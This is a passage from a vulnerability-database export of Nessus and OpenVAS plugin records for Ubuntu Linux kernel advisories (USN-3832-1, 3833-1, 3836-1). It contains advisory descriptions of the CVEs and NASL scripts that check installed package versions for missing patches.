(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1025-gcp\", pkgver:\"4.15.0-1025.26~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-42-generic\", pkgver:\"4.15.0-42.45~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-42-generic-lpae\", pkgver:\"4.15.0-42.45~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-42-lowlatency\", pkgver:\"4.15.0-42.45~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1025.39\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.15.0.42.63\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.15.0.42.63\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1025.39\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.15.0.42.63\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.42.63\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-gcp / linux-image-4.15-generic / etc\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:44:21", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-20T00:00:00", "id": "UBUNTU_USN-3836-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119339", "published": "2018-12-04T00:00:00", "title": "Ubuntu 18.04 LTS : linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities (USN-3836-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3836-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119339);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/20 11:08:46\");\n\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_xref(name:\"USN\", value:\"3836-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities (USN-3836-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the Linux kernel mishandles mapping UID or\nGID ranges inside nested user namespaces in some situations. A local\nattacker could use this to bypass access controls on resources outside\nthe namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the\nLinux kernel did not properly verify the directory contents\npermissions from within a unprivileged user namespace. A local\nattacker could use this to expose sensitive information (protected\nfile names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3836-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Nested User Namespace idmap Limit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1025-gcp\", pkgver:\"4.15.0-1025.26\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1027-kvm\", pkgver:\"4.15.0-1027.27\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1029-raspi2\", pkgver:\"4.15.0-1029.31\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-42-generic\", pkgver:\"4.15.0-42.45\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-42-generic-lpae\", pkgver:\"4.15.0-42.45\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-42-lowlatency\", pkgver:\"4.15.0-42.45\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-42-snapdragon\", pkgver:\"4.15.0-42.45\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1025.27\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic\", pkgver:\"4.15.0.42.44\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.15.0.42.44\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1025.27\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.15.0.1027.27\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.15.0.42.44\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.15.0.1029.27\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.15.0.42.44\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-gcp / linux-image-4.15-generic / etc\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:44:20", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-20T00:00:00", "id": "UBUNTU_USN-3833-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119303", "published": "2018-11-30T00:00:00", "title": "Ubuntu 18.04 LTS : linux-aws vulnerabilities (USN-3833-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3833-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119303);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/20 11:08:46\");\n\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_xref(name:\"USN\", value:\"3833-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux-aws vulnerabilities (USN-3833-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the Linux kernel mishandles mapping UID or\nGID ranges inside nested user namespaces in some situations. A local\nattacker could use this to bypass access controls on resources outside\nthe namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the\nLinux kernel did not properly verify the directory contents\npermissions from within a unprivileged user namespace. A local\nattacker could use this to expose sensitive information (protected\nfile names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3833-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.15-aws and / or linux-image-aws\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Nested User Namespace idmap Limit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1029-aws\", pkgver:\"4.15.0-1029.30\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-aws\", pkgver:\"4.15.0.1029.29\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-aws / linux-image-aws\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:44:20", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the procfs file system implementation in the Linux kernel did not properly restrict the ability to inspect the kernel stack of an arbitrary task. A local attacker could use this to expose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did not properly flush the TLB when completing, potentially leaving access to a physical page after it has been released to the page allocator. A local attacker could use this to cause a denial of service (system crash), expose sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not correctly compute numeric bounds in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux kernel did not properly enforce signed module loading when booted with UEFI Secure Boot in some situations. A local privileged attacker could use this to execute untrusted code in the kernel.\n(CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-07T00:00:00", "id": "UBUNTU_USN-3832-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119302", "published": "2018-11-30T00:00:00", "title": "Ubuntu 18.10 : linux-aws vulnerabilities (USN-3832-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3832-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119302);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/07 9:46:53\");\n\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18281\", \"CVE-2018-18445\", \"CVE-2018-18653\", \"CVE-2018-18955\", \"CVE-2018-6559\");\n script_xref(name:\"USN\", value:\"3832-1\");\n\n script_name(english:\"Ubuntu 18.10 : linux-aws vulnerabilities (USN-3832-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the procfs file system implementation in the\nLinux kernel did not properly restrict the ability to inspect the\nkernel stack of an arbitrary task. A local attacker could use this to\nexpose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel\ndid not properly flush the TLB when completing, potentially leaving\naccess to a physical page after it has been released to the page\nallocator. A local attacker could use this to cause a denial of\nservice (system crash), expose sensitive information, or possibly\nexecute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\ncorrectly compute numeric bounds in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the\nLinux kernel did not properly enforce signed module loading when\nbooted with UEFI Secure Boot in some situations. A local privileged\nattacker could use this to execute untrusted code in the kernel.\n(CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or\nGID ranges inside nested user namespaces in some situations. A local\nattacker could use this to bypass access controls on resources outside\nthe namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the\nLinux kernel did not properly verify the directory contents\npermissions from within a unprivileged user namespace. A local\nattacker could use this to expose sensitive information (protected\nfile names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3832-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.18-aws and / or linux-image-aws\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Nested User Namespace idmap Limit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1006-aws\", pkgver:\"4.18.0-1006.7\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-aws\", pkgver:\"4.18.0.1006.6\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-aws / linux-image-aws\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-03-19T12:26:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310843839", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843839", "title": "Ubuntu Update for linux-aws USN-3833-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3833_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3833-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843839\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_bugtraq_id(106054);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 12:40:35 +0530 (Tue, 04 Dec 2018)\");\n script_name(\"Ubuntu Update for linux-aws USN-3833-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3833-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3833-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the USN-3833-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the Linux kernel mishandles mapping UID or GID\nranges inside nested user namespaces in some situations. A local attacker\ncould use this to bypass access controls on resources outside the\nnamespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux\nkernel did not properly verify the directory contents permissions from\nwithin a unprivileged user namespace. A local attacker could use this to\nexpose sensitive information (protected file names). (CVE-2018-6559)\");\n\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1029-aws\", ver:\"4.15.0-1029.30\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1029.29\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-19T12:26:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310843840", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843840", "title": "Ubuntu Update for linux-aws USN-3832-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3832_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3832-1\n#\n# Authors:\n# System Generated Check\n#\n# 